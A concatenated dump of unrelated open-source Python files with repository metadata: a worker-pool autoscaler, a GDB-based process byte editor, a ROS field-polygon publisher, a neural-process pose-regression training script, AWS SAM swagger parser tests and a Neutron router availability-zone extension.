self._last_action = None
self._shutdown = threading.Event()
self._stopped = threading.Event()
self.setDaemon(True)
self.setName(self.__class__.__name__)
assert self.keepalive, "can't scale down too fast."
def scale(self):
current = min(self.qty, self.max_concurrency)
if current > self.processes:
self.scale_up(current - self.processes)
elif current < self.processes:
self.scale_down((self.processes - current) - self.min_concurrency)
sleep(1.0)
def scale_up(self, n):
self.logger.info("Scaling up %s processes." % (n, ))
self._last_action = time()
return self.pool.grow(n)
def scale_down(self, n):
if not self._last_action or not n:
return
if time() - self._last_action > self.keepalive:
self.logger.info("Scaling down %s processes." % (n, ))
self._last_action = time()
try:
self.pool.shrink(n)
except ValueError:
self.logger.debug(
"Autoscaler won't scale down: all processes busy.")
except Exception, exc:
self.logger.error("Autoscaler: scale_down: %r\n%r" % (
exc, traceback.format_stack()),
exc_info=sys.exc_info())
def run(self):
while not self._shutdown.isSet():
try:
self.scale()
except Exception, exc:
self.logger.error("Thread Autoscaler crashed: %r" % (exc, ),
exc_info=sys.exc_info())
os._exit(1)
self._stopped.set()
def stop(self):
self._shutdown.set()
self._stopped.wait()
if self.isAlive():
self.join(1e10)
@property
def qty(self):
return len(state.reserved_requests)
@property
def processes(self):
return self.pool._pool._processes
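

# Hypothetical usage sketch (added; Python 2 era API -- pool and logger are
# assumed to come from the worker setup):
#     scaler = Autoscaler(pool, max_concurrency=10, min_concurrency=2,
#                         logger=logger)
#     scaler.start()  # grows/shrinks the pool based on reserved requests
#     ...
#     scaler.stop()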
| 30.925926
| 78
| 0.57006
|
3382bf834e7b411a060a6f6b1f352083713ece9b
| 2,093
|
py
|
Python
|
binject/gdb.py
|
torpedro/binject.py
|
9652b48aeb2663c49b3ec154d9186c9c6cac89cf
|
[
"MIT"
] | 1
|
2016-02-17T22:01:01.000Z
|
2016-02-17T22:01:01.000Z
|
binject/gdb.py
|
torpedro/binject.py
|
9652b48aeb2663c49b3ec154d9186c9c6cac89cf
|
[
"MIT"
] | null | null | null |
binject/gdb.py
|
torpedro/binject.py
|
9652b48aeb2663c49b3ec154d9186c9c6cac89cf
|
[
"MIT"
] | null | null | null |
from time import sleep
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
from edit import AbstractByteEditor
def logStdoutThread(p, gdb):
for c in iter(lambda: p.stdout.read(1), ''):
gdb.onStdout(c)
class GDBWrapper(AbstractByteEditor):
"""docstring for GDBWrapper"""
def __init__(self, pid, gdb="gdb"):
super(GDBWrapper, self).__init__()
self._gdb = gdb
self._pid = pid
self._lines = [""]
def onStdout(self, c):
if len(c) > 1:
for d in c:
self.onStdout(d)
else:
if c == "\n":
# print self._lines[-1]
self._lines.append("")
else:
self._lines[-1] += c
def writeToStdin(self, line):
line = "%s\n" % (line)
self.onStdout(line)
self._p.stdin.write(line)
self._p.stdin.flush()
def _waitForPrompt(self):
while self._lines[-1].startswith("(gdb)") is False:
sleep(0.001)
def open(self):
p = Popen([self._gdb, "-p", str(self._pid)], stdin=PIPE, stdout=PIPE, stderr=STDOUT)
self._p = p
t = Thread(target=logStdoutThread, args=(p, self))
t.start()
self._isOpen = True
self._waitForPrompt()
def quit(self):
self.writeToStdin("quit\n")
self.writeToStdin("y")
def getByte(self, address):
self.writeToStdin("x/ubfx %s" % (address))
# self.writeToStdin("p *(char*)%s" % (address))
self._waitForPrompt()
res = self._lines[-2]
print "[Result] ", res
# TODO return
def setByteInt(self, address, intvalue):
self.writeToStdin("set (*(char*)%s) = %d" % (address, intvalue))
self._waitForPrompt()
res = self._lines[-2]
# print res
def setByteHex(self, address, hexvalue):
return self.setByteInt(address, int(hexvalue, 16))
def wait(self):
self._p.wait()
def close(self):
self.quit()
self.wait()
self._isOpen = False
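

# Hypothetical usage sketch (added; assumes gdb on PATH, a live target PID,
# and sufficient ptrace privileges):
#     g = GDBWrapper(1234)
#     g.open()
#     g.setByteHex("0x400000", "0x90")  # patch one byte (e.g. to a NOP)
#     g.close()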
| 24.623529
| 92
| 0.547062
|
90a78b912a5f23dbfc8a9c4efeee839a21a843e4
| 73
|
py
|
Python
|
test.py
|
charisschomba/Password-Generator
|
9f4bcee5f008ca98c91f9722630bc9b120e0ecd2
|
[
"MIT"
] | null | null | null |
test.py
|
charisschomba/Password-Generator
|
9f4bcee5f008ca98c91f9722630bc9b120e0ecd2
|
[
"MIT"
] | null | null | null |
test.py
|
charisschomba/Password-Generator
|
9f4bcee5f008ca98c91f9722630bc9b120e0ecd2
|
[
"MIT"
] | null | null | null |
from password_generator import password_generator
password_generator(20)
| 24.333333
| 49
| 0.90411
|
0587045a70a089d0e2fb0c2508b2623eba5fd3c0
| 3,700
|
py
|
Python
|
automow_maps/scripts/field_publisher.py
|
Auburn-Automow/au_automow_common
|
920be6a740aa6d738e9954417b41490e353efd04
|
[
"BSD-3-Clause"
] | 43
|
2016-03-05T17:06:29.000Z
|
2022-03-10T08:50:46.000Z
|
automow_maps/scripts/field_publisher.py
|
qintxwd/au_automow_common
|
920be6a740aa6d738e9954417b41490e353efd04
|
[
"BSD-3-Clause"
] | 2
|
2017-07-10T12:43:49.000Z
|
2019-03-13T13:57:31.000Z
|
automow_maps/scripts/field_publisher.py
|
qintxwd/au_automow_common
|
920be6a740aa6d738e9954417b41490e353efd04
|
[
"BSD-3-Clause"
] | 22
|
2016-03-23T06:10:52.000Z
|
2022-03-10T08:50:49.000Z
|
#!/usr/bin/env python
"""
This ROS node takes the field survey file and publishes a
field polygon as a geometry_msgs/PolygonStamped for use in
other nodes and for visualization in rviz.
"""
import roslib; roslib.load_manifest('automow_maps')
import rospy
from geometry_msgs.msg import PolygonStamped, Point32, Polygon
class FieldPublisherNode(object):
"""
This is a ROS node that is responsible for publishing the field.
"""
def __init__(self):
# Setup ROS node
rospy.init_node('field_publisher')
# Get ROS parameters
self.field_polygon = rospy.get_param("~field_polygon")
self.field_frame_id = rospy.get_param("~field_frame_id", "odom")
# Setup publishers and subscribers
safety_pub = rospy.Publisher('/field/safety', PolygonStamped, latch=True)
boundry_pub = rospy.Publisher('/field/boundry', PolygonStamped, latch=True)
cut_area_pub = rospy.Publisher('/field/cut_area', PolygonStamped, latch=True)
# Read the field in
if self.read_field_file():
# Publish the msg once, it is latched so no need to repeat
safety_pub.publish(self.safety_msg)
boundry_pub.publish(self.boundry_msg)
cut_area_pub.publish(self.cut_area_msg)
# Spin
rospy.spin()
def read_field_file(self):
# Setup msgs
self.safety_msg = PolygonStamped()
self.boundry_msg = PolygonStamped()
self.cut_area_msg = PolygonStamped()
self.safety_msg.header.stamp = rospy.Time.now()
self.safety_msg.header.frame_id = self.field_frame_id
self.boundry_msg.header = self.safety_msg.header
self.cut_area_msg.header = self.safety_msg.header
# Parse out the points
polygon_points = []
polygon_points32 = []
point_count = 0
for point in self.field_polygon:
point_count += 1
if point['fix_type'] < 3:
rospy.logwarn('Point %i has a low quality fix type of %i'
% (point_count, point['fix_type']))
(easting, northing) = (point['easting'], point['northing'])
polygon_points.append((float(easting), float(northing)))
polygon_points32.append(Point32(float(easting), float(northing), 0))
# Put the points into the boundry_msg
self.boundry_msg.polygon = Polygon(polygon_points32)
# Expand and contract the field shape for safety buffer and cut area
safety_points = self.offset_polygon(polygon_points, 2)
cut_area_points = self.offset_polygon(polygon_points, -0.5)
self.safety_msg.polygon = Polygon(safety_points)
self.cut_area_msg.polygon = Polygon(cut_area_points)
return True
def offset_polygon(self, points, offset):
import polygon_offset
from polygon_offset import getinsetpoint
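        # (added) getinsetpoint maps three consecutive vertices to the offset
        # corner at the middle vertex; the two extra calls after the loop wrap
        # around so the corners at points[-1] and points[0] are covered too.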
temp_points = []
polygon_offset.OFFSET = -offset
for i in range(len(points)-2):
temp_points.append(getinsetpoint(points[i],
points[i+1],
points[i+2]))
temp_points.append(getinsetpoint(points[-2],
points[-1],
points[0]))
temp_points.append(getinsetpoint(points[-1],
points[0],
points[1]))
result = []
for point in temp_points:
result.append(Point32(point[0], point[1], 0))
return result
if __name__ == '__main__':
fpn = FieldPublisherNode()
| 37
| 85
| 0.605405
|
a95ab201c298bf9c8eb8497f2f7d6fcc6aab2b40
| 15,079
|
py
|
Python
|
meta_augmentation/pose_regression/np_vanilla.py
|
gunpowder78/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-19T04:26:12.000Z
|
2022-03-19T04:26:12.000Z
|
meta_augmentation/pose_regression/np_vanilla.py
|
gunpowder78/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | null | null | null |
meta_augmentation/pose_regression/np_vanilla.py
|
gunpowder78/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-30T07:20:29.000Z
|
2022-03-30T07:20:29.000Z
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: skip-file
"""NP vanilla.
Based on code by Mingzhang Yin (https://github.com/google-research/google-research/tree/master/meta_learning_without_memorization)
"""
from __future__ import print_function
import functools
import os
import pickle
import time
from absl import app
from absl import flags
import numpy as np
import tensorflow.compat.v1 as tf
# (added) needed for the --weight_decay branch below; available in TF 1.x only.
from tensorflow.contrib import opt as contrib_opt
from tensorflow.compat.v1.keras.layers import Conv2D
from tensorflow.compat.v1.keras.layers import MaxPooling2D
#tf.compat.v1.enable_v2_tensorshape()
FLAGS = flags.FLAGS
## Dataset/method options
flags.DEFINE_float('beta', 0.001, 'the beta for weight decay')
flags.DEFINE_bool('weight_decay', False, 'whether or not to use weight decay')
flags.DEFINE_string('logdir', '/tmp/data',
'directory for summaries and checkpoints.')
flags.DEFINE_string('data_dir', None,
'Directory of data files.')
get_data_dir = lambda: FLAGS.data_dir
flags.DEFINE_list('data', ['train_data_ins.pkl', 'val_data_ins.pkl'],
'data name')
flags.DEFINE_integer('update_batch_size', 15, 'number of context/target')
flags.DEFINE_integer('meta_batch_size', 10, 'number of tasks')
flags.DEFINE_integer('dim_im', 128, 'image size')
flags.DEFINE_integer('dim_y', 1, 'dimension of y')
## Training options
flags.DEFINE_list('n_hidden_units_g', [100, 100],
'number of tasks sampled per meta-update')
flags.DEFINE_list('n_hidden_units_r', [100, 100],
'number of inner gradient updates during test.')
flags.DEFINE_integer('dim_z', 64, 'dimension of z')
flags.DEFINE_integer('dim_r', 100, 'dimension of r for aggregating')
flags.DEFINE_float('update_lr', 0.001, 'lr')
flags.DEFINE_integer('num_updates', 140000, 'num_updates')
flags.DEFINE_integer('trial', 1, 'trial number')
flags.DEFINE_integer(
'num_classes', 1,
'number of classes used in classification (e.g. 5-way classification).')
flags.DEFINE_bool('deterministic', True, 'deterministic encoder')
## IB options
flags.DEFINE_integer('dim_w', 64, 'dimension of w')
flags.DEFINE_float('facto', 1.0, 'zero out z to memorize or not')
flags.DEFINE_integer('num_noise', 0, 'Discrete noise augmentation.')
flags.DEFINE_float('noise_scale', 0, 'Add noise')
flags.DEFINE_bool('testing', True, 'Set True for evaluating on test split.')
NOISE_PREFIX = 'v3'
def get_batch(x, y, is_training):
"""Get data batch."""
xs, ys, xq, yq = [], [], [], []
for _ in range(FLAGS.meta_batch_size):
# sample WAY classes
classes = np.random.choice(
range(np.shape(x)[0]), size=FLAGS.num_classes, replace=False)
support_set = []
query_set = []
support_sety = []
query_sety = []
for k in list(classes):
# sample SHOT and QUERY instances
idx = np.random.choice(
range(np.shape(x)[1]),
size=FLAGS.update_batch_size + FLAGS.update_batch_size,
replace=False)
x_k = x[k][idx]
# Ranges from (0, 1)
y_k = y[k][idx].copy()
if FLAGS.num_noise and is_training:
noise_values = np.linspace(0, 1, FLAGS.num_noise+1)[:-1]
noise = np.random.choice(noise_values)
y_k = (y_k + noise) % 1.0
elif FLAGS.noise_scale and is_training:
scale = FLAGS.noise_scale
low, high = -scale, scale
y_k = (y_k + np.random.uniform(low, high)) % 1.0
support_set.append(x_k[:FLAGS.update_batch_size])
query_set.append(x_k[FLAGS.update_batch_size:])
support_sety.append(y_k[:FLAGS.update_batch_size])
query_sety.append(y_k[FLAGS.update_batch_size:])
xs_k = np.concatenate(support_set, 0)
xq_k = np.concatenate(query_set, 0)
ys_k = np.concatenate(support_sety, 0)
yq_k = np.concatenate(query_sety, 0)
xs.append(xs_k)
xq.append(xq_k)
ys.append(ys_k)
yq.append(yq_k)
xs, ys = np.stack(xs, 0), np.stack(ys, 0)
xq, yq = np.stack(xq, 0), np.stack(yq, 0)
xs = np.reshape(
xs,
[FLAGS.meta_batch_size, FLAGS.update_batch_size * FLAGS.num_classes, -1])
xq = np.reshape(
xq,
[FLAGS.meta_batch_size, FLAGS.update_batch_size * FLAGS.num_classes, -1])
xs = xs.astype(np.float32) / 255.0
xq = xq.astype(np.float32) / 255.0
ys = ys.astype(np.float32) * 10.0
yq = yq.astype(np.float32) * 10.0
return xs, ys, xq, yq
def gen(x, y, is_training):
while True:
yield get_batch(np.array(x), np.array(y), is_training)
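

# Note (added): `sampling` below is the standard reparameterization trick: it
# splits `output` into (mu, logstd), maps logstd through softplus to get a
# positive sigma, and returns ws = mu + eps * sigma with eps ~ N(0, I), so
# gradients flow through mu and sigma while ws remains a Gaussian sample.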
def sampling(output):
mu, logstd = tf.split(output, num_or_size_splits=2, axis=-1)
sigma = tf.nn.softplus(logstd)
ws = mu + tf.random_normal(tf.shape(mu)) * sigma
return ws, mu, sigma
def mse(pred, label):
pred = tf.reshape(pred, [-1])
label = tf.reshape(label, [-1])
return tf.reduce_mean(tf.square(pred - label))
def encoder_r(xys):
"""Define encoder."""
with tf.variable_scope('encoder_r', reuse=tf.AUTO_REUSE):
hidden_layer = xys
# First layers are relu
for i, n_hidden_units in enumerate(FLAGS.n_hidden_units_r):
hidden_layer = tf.layers.dense(
hidden_layer,
n_hidden_units,
activation=tf.nn.relu,
name='encoder_r_{}'.format(i),
reuse=tf.AUTO_REUSE,
kernel_initializer='normal')
# Last layer is simple linear
i = len(FLAGS.n_hidden_units_r)
r = tf.layers.dense(
hidden_layer,
FLAGS.dim_r,
name='encoder_r_{}'.format(i),
reuse=tf.AUTO_REUSE,
kernel_initializer='normal')
return r
def encoder_w(xs, encoder_w0):
"""xs is [n_task, n_im, dim_x]; return [n_task, n_im, dim_w]."""
n_task = tf.shape(xs)[0]
n_im = tf.shape(xs)[1]
xs = tf.reshape(xs, [-1, 128, 128, 1])
ws = encoder_w0(xs)
ws = tf.reshape(ws, [n_task, n_im, FLAGS.dim_w])
return ws
def xy_to_z(xs, ys, encoder_w0):
r"""ws = T0(xs), rs = T1(ws, ys), r = mean(rs), z \sim N(mu(r), sigma(r))."""
with tf.variable_scope(''):
ws = encoder_w(xs, encoder_w0) # (n_task * n_im_per_task) * dim_w
transformed_ys = tf.layers.dense(
ys,
FLAGS.dim_w // 4,
name='lift_y',
reuse=tf.AUTO_REUSE,
kernel_initializer='normal')
wys = tf.concat([ws, transformed_ys],
axis=-1) # n_task * n_im_per_task * (dim_w+dim_transy)
rs = encoder_r(wys) # n_task * n_im_per_task * dim_r
r = tf.reduce_mean(rs, axis=1, keepdims=True) # n_task * 1 * dim_r
if FLAGS.deterministic:
z_sample = tf.layers.dense(
r,
FLAGS.dim_z,
name='r2z',
reuse=tf.AUTO_REUSE,
kernel_initializer='normal')
else:
z = tf.layers.dense(
r,
FLAGS.dim_z + FLAGS.dim_z,
name='r2z',
reuse=tf.AUTO_REUSE,
kernel_initializer='normal')
z_sample, _, _ = sampling(z)
return tf.tile(z_sample, [1, FLAGS.update_batch_size, 1]) # tile n_targets
def construct_model(input_tensors, encoder_w0, decoder0, prefix=None):
"""Construct model."""
facto = tf.placeholder_with_default(1.0, ())
context_xs = input_tensors['inputa']
context_ys = input_tensors['labela']
target_xs = input_tensors['inputb']
target_ys = input_tensors['labelb']
# sample ws ~ w|(x_all,a), rs = T(ws, ys), r = mean(rs), z = T(r)
# x_all = tf.concat([context_xs, target_xs], axis=1) #n_task * 20 * (128*128)
# y_all = tf.concat([context_ys, target_ys], axis=1)
x_all = context_xs
y_all = context_ys
# n_task * [n_im] * d_z
if 'train' in prefix:
z_samples = xy_to_z(x_all, y_all, encoder_w0) * facto
else:
z_samples = xy_to_z(context_xs, context_ys, encoder_w0) * facto
target_ws = encoder_w(target_xs, encoder_w0)
input_zxs = tf.concat([z_samples, target_ws], axis=-1)
# sample y_hat ~ y|(w,z)
with tf.variable_scope('decoder'):
target_yhat_mu = decoder0(input_zxs) # n_task * n_im * dim_y
# when var of p(y | x,z) is fixed, neg-loglik <=> MSE
mse_loss = mse(target_yhat_mu, target_ys)
tf.summary.scalar(prefix + 'mse', mse_loss)
optimizer1 = tf.train.AdamOptimizer(FLAGS.update_lr)
optimizer2 = tf.train.AdamOptimizer(FLAGS.update_lr)
if 'train' in prefix:
if FLAGS.weight_decay:
loss = mse_loss
optimizer = contrib_opt.AdamWOptimizer(
weight_decay=FLAGS.beta, learning_rate=FLAGS.update_lr)
gvs = optimizer.compute_gradients(loss)
train_op = optimizer.apply_gradients(gvs)
else:
THETA = ( # pylint: disable=invalid-name
tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='decoder')
+ tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='encoder_w'))
all_var = tf.trainable_variables()
PHI = [v for v in all_var if v not in THETA] # pylint: disable=invalid-name
loss = mse_loss
gvs_theta = optimizer1.compute_gradients(loss, THETA)
train_theta_op = optimizer1.apply_gradients(gvs_theta)
gvs_phi = optimizer2.compute_gradients(loss, PHI)
train_phi_op = optimizer2.apply_gradients(gvs_phi)
with tf.control_dependencies([train_theta_op, train_phi_op]):
train_op = tf.no_op()
return mse_loss, train_op, facto
else:
return mse_loss
def main(_):
encoder_w0 = tf.keras.Sequential([
Conv2D(
filters=32,
kernel_size=3,
strides=(2, 2),
activation='relu',
padding='same'),
Conv2D(
filters=48,
kernel_size=3,
strides=(2, 2),
activation='relu',
padding='same'),
MaxPooling2D(pool_size=(2, 2)),
Conv2D(
filters=64,
kernel_size=3,
strides=(2, 2),
activation='relu',
padding='same'),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(FLAGS.dim_w),
])
decoder0 = tf.keras.Sequential([
tf.keras.layers.Dense(100, activation=tf.nn.relu),
tf.keras.layers.Dense(100, activation=tf.nn.relu),
tf.keras.layers.Dense(FLAGS.dim_y),
])
dim_output = FLAGS.dim_y
dim_input = FLAGS.dim_im * FLAGS.dim_im * 1
exp_basename = 'np_vanilla'
if FLAGS.noise_scale:
exp_basename = 'np_vanilla_noised_scale' + str(FLAGS.noise_scale)
elif FLAGS.num_noise > 0:
exp_basename = 'np_vanilla_noise' + str(FLAGS.num_noise)
if FLAGS.weight_decay:
exp_name = '%s.update_lr-%g.beta-%g.trial-%d' % (
exp_basename, FLAGS.update_lr, FLAGS.beta, FLAGS.trial)
else:
exp_name = '%s.update_lr-%g.trial-%d' % (exp_basename, FLAGS.update_lr,
FLAGS.trial)
if FLAGS.testing:
exp_name += "-test"
checkpoint_dir = os.path.join(FLAGS.logdir, exp_name)
if FLAGS.testing:
data = [FLAGS.data[0], FLAGS.data[1]]
else:
data = [FLAGS.data[0], FLAGS.data[0]]
x_train, y_train = pickle.load(
tf.io.gfile.GFile(os.path.join(get_data_dir(), data[0]), 'rb'))
x_val, y_val = pickle.load(
tf.io.gfile.GFile(os.path.join(get_data_dir(), data[1]), 'rb'))
if not FLAGS.testing:
# Split the train dataset into val and train
x_train, y_train = x_train[:-5], y_train[:-5]
x_val, y_val = x_val[-5:], y_val[-5:]
x_train, y_train = np.array(x_train), np.array(y_train)
y_train = y_train[:, :, -1, None]
x_val, y_val = np.array(x_val), np.array(y_val)
y_val = y_val[:, :, -1, None]
ds_train = tf.data.Dataset.from_generator(
functools.partial(gen, x_train, y_train, True),
(tf.float32, tf.float32, tf.float32, tf.float32),
(tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_input]),
tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_output]),
tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_input]),
tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_output])))
ds_val = tf.data.Dataset.from_generator(
functools.partial(gen, x_val, y_val, False),
(tf.float32, tf.float32, tf.float32, tf.float32),
(tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_input]),
tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_output]),
tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_input]),
tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_output])))
inputa, labela, inputb, labelb = ds_train.make_one_shot_iterator().get_next()
  input_tensors = {'inputa': inputa,
                   'inputb': inputb,
                   'labela': labela, 'labelb': labelb}
  inputa_val, labela_val, inputb_val, labelb_val = (
      ds_val.make_one_shot_iterator().get_next())
  metaval_input_tensors = {'inputa': inputa_val,
                           'inputb': inputb_val,
                           'labela': labela_val, 'labelb': labelb_val}
loss, train_op, facto = construct_model(
input_tensors, encoder_w0, decoder0, prefix='metatrain_')
loss_val = construct_model(
metaval_input_tensors, encoder_w0, decoder0, prefix='metaval_')
###########
summ_op = tf.summary.merge_all()
sess = tf.InteractiveSession()
summary_writer = tf.summary.FileWriter(checkpoint_dir, sess.graph)
tf.global_variables_initializer().run()
PRINT_INTERVAL = 50 # pylint: disable=invalid-name
SUMMARY_INTERVAL = 5 # pylint: disable=invalid-name
  val_step = []
train_k, val_k = [], []
# scratch buffers
prelosses, prelosses_val = [], []
old_time = time.time()
for itr in range(FLAGS.num_updates):
feed_dict = {facto: FLAGS.facto}
if itr % SUMMARY_INTERVAL == 0:
summary, cost, cost_val = sess.run([summ_op, loss, loss_val], feed_dict)
summary_writer.add_summary(summary, itr)
prelosses.append(cost) # 0 step loss on training set
prelosses_val.append(cost_val) # 0 step loss on meta_val training set
sess.run(train_op, feed_dict)
if (itr != 0) and itr % PRINT_INTERVAL == 0:
val_step.append(itr)
print('Iteration ' + str(itr) + ': ' + str(np.mean(prelosses)), 'time =',
time.time() - old_time)
prelosses = []
old_time = time.time()
print('Validation results: ' + str(np.mean(prelosses_val)))
      # Dump results (there is no inner-loop loss to record here).
train_k.append(np.mean(prelosses))
val_k.append(np.mean(prelosses_val))
all_ = (val_step, train_k, val_k)
pickle.dump(all_, open(os.path.join(checkpoint_dir, 'results.p'), 'wb'))
prelosses_val = []
prelosses = []
if __name__ == '__main__':
app.run(main)
| 33.658482
| 130
| 0.654752
|
6468332db8de40570bf841ed76a14f42216da9e2
| 6,140
|
py
|
Python
|
tests/unit/commands/local/lib/swagger/test_parser.py
|
paoptu023/aws-sam-cli
|
e382d603f739e9694d64f622daa228ccfe4581f4
|
[
"Apache-2.0"
] | 1
|
2019-06-27T15:18:46.000Z
|
2019-06-27T15:18:46.000Z
|
tests/unit/commands/local/lib/swagger/test_parser.py
|
paoptu023/aws-sam-cli
|
e382d603f739e9694d64f622daa228ccfe4581f4
|
[
"Apache-2.0"
] | 3
|
2020-01-27T05:20:12.000Z
|
2020-10-03T01:01:11.000Z
|
tests/unit/commands/local/lib/swagger/test_parser.py
|
paoptu023/aws-sam-cli
|
e382d603f739e9694d64f622daa228ccfe4581f4
|
[
"Apache-2.0"
] | 1
|
2020-10-14T15:57:07.000Z
|
2020-10-14T15:57:07.000Z
|
"""
Test the swagger parser
"""
from unittest import TestCase
from unittest.mock import patch, Mock
from parameterized import parameterized, param
from samcli.commands.local.lib.swagger.parser import SwaggerParser
from samcli.local.apigw.local_apigw_service import Route
class TestSwaggerParser_get_apis(TestCase):
def test_with_one_path_method(self):
function_name = "myfunction"
swagger = {
"paths": {"/path1": {"get": {"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}}}}
}
parser = SwaggerParser(swagger)
parser._get_integration_function_name = Mock()
parser._get_integration_function_name.return_value = function_name
expected = [Route(path="/path1", methods=["get"], function_name=function_name)]
result = parser.get_routes()
self.assertEqual(expected, result)
parser._get_integration_function_name.assert_called_with(
{"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}}
)
def test_with_combination_of_paths_methods(self):
function_name = "myfunction"
swagger = {
"paths": {
"/path1": {
"get": {"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}},
"delete": {"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}},
},
"/path2": {"post": {"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}}},
}
}
parser = SwaggerParser(swagger)
parser._get_integration_function_name = Mock()
parser._get_integration_function_name.return_value = function_name
expected = {
Route(path="/path1", methods=["get"], function_name=function_name),
Route(path="/path1", methods=["delete"], function_name=function_name),
Route(path="/path2", methods=["post"], function_name=function_name),
}
result = parser.get_routes()
self.assertEqual(expected, set(result))
def test_with_any_method(self):
function_name = "myfunction"
swagger = {
"paths": {
"/path1": {
"x-amazon-apigateway-any-method": {
"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}
}
}
}
}
parser = SwaggerParser(swagger)
parser._get_integration_function_name = Mock()
parser._get_integration_function_name.return_value = function_name
expected = [Route(methods=["ANY"], path="/path1", function_name=function_name)]
result = parser.get_routes()
self.assertEqual(expected, result)
def test_does_not_have_function_name(self):
swagger = {
"paths": {"/path1": {"post": {"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}}}}
}
parser = SwaggerParser(swagger)
parser._get_integration_function_name = Mock()
parser._get_integration_function_name.return_value = None # Function Name could not be resolved
expected = []
result = parser.get_routes()
self.assertEqual(expected, result)
@parameterized.expand(
[
param("empty swagger", {}),
param("'paths' property is absent", {"foo": "bar"}),
param("no paths", {"paths": {}}),
param("no methods", {"paths": {"/path1": {}}}),
param("no integration", {"paths": {"/path1": {"get": {}}}}),
]
)
def test_invalid_swagger(self, test_case_name, swagger):
parser = SwaggerParser(swagger)
result = parser.get_routes()
expected = []
self.assertEqual(expected, result)
class TestSwaggerParser_get_integration_function_name(TestCase):
@patch("samcli.commands.local.lib.swagger.parser.LambdaUri")
def test_valid_integration(self, LambdaUriMock):
function_name = "name"
LambdaUriMock.get_function_name.return_value = function_name
method_config = {"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}}
parser = SwaggerParser({})
result = parser._get_integration_function_name(method_config)
self.assertEqual(function_name, result)
LambdaUriMock.get_function_name.assert_called_with("someuri")
@parameterized.expand(
[
param("config is not dict", "myconfig"),
param("integration key is not in config", {"key": "value"}),
param("integration value is empty", {"x-amazon-apigateway-integration": {}}),
param("integration value is not dict", {"x-amazon-apigateway-integration": "someval"}),
param("integration type is not aws_proxy", {"x-amazon-apigateway-integration": {"type": "mock"}}),
param("integration uri is not present", {"x-amazon-apigateway-integration": {"type": "aws_proxy"}}),
]
)
@patch("samcli.commands.local.lib.swagger.parser.LambdaUri")
def test_invalid_integration(self, test_case_name, method_config, LambdaUriMock):
LambdaUriMock.get_function_name.return_value = None
parser = SwaggerParser({})
result = parser._get_integration_function_name(method_config)
self.assertIsNone(result, "must not parse invalid integration")
class TestSwaggerParser_get_binary_media_types(TestCase):
@parameterized.expand(
[
param("Swagger was none", None, []),
param("Swagger is has no binary media types defined", {}, []),
param(
"Swagger define binary media types",
{"x-amazon-apigateway-binary-media-types": ["image/gif", "application/json"]},
["image/gif", "application/json"],
),
]
)
def test_binary_media_type_returned(self, test_case_name, swagger, expected_result):
parser = SwaggerParser(swagger)
self.assertEqual(parser.get_binary_media_types(), expected_result)
| 38.616352
| 119
| 0.619218
|
3cd718c8bf8da2ec682ca1f2a611e0cda21d98ea
| 2,001
|
py
|
Python
|
neutron/extensions/router_availability_zone.py
|
hashsos/hashcloudos-neutron
|
76ec5ca105043be6bf7220b5c5684190ddf14952
|
[
"Apache-2.0"
] | null | null | null |
neutron/extensions/router_availability_zone.py
|
hashsos/hashcloudos-neutron
|
76ec5ca105043be6bf7220b5c5684190ddf14952
|
[
"Apache-2.0"
] | null | null | null |
neutron/extensions/router_availability_zone.py
|
hashsos/hashcloudos-neutron
|
76ec5ca105043be6bf7220b5c5684190ddf14952
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from neutron_lib.api.definitions import availability_zone as az_def
from neutron_lib.api import extensions
import six
EXTENDED_ATTRIBUTES_2_0 = {
'routers': {
az_def.COLLECTION_NAME: {'allow_post': False, 'allow_put': False,
'is_visible': True},
az_def.AZ_HINTS: {
'allow_post': True, 'allow_put': False, 'is_visible': True,
'validate': {'type:availability_zone_hint_list': None},
'default': []}}
}
class Router_availability_zone(extensions.ExtensionDescriptor):
"""Router availability zone extension."""
@classmethod
def get_name(cls):
return "Router Availability Zone"
@classmethod
def get_alias(cls):
return "router_availability_zone"
@classmethod
def get_description(cls):
return "Availability zone support for router."
@classmethod
def get_updated(cls):
return "2015-01-01T10:00:00-00:00"
def get_required_extensions(self):
return ["router", "availability_zone"]
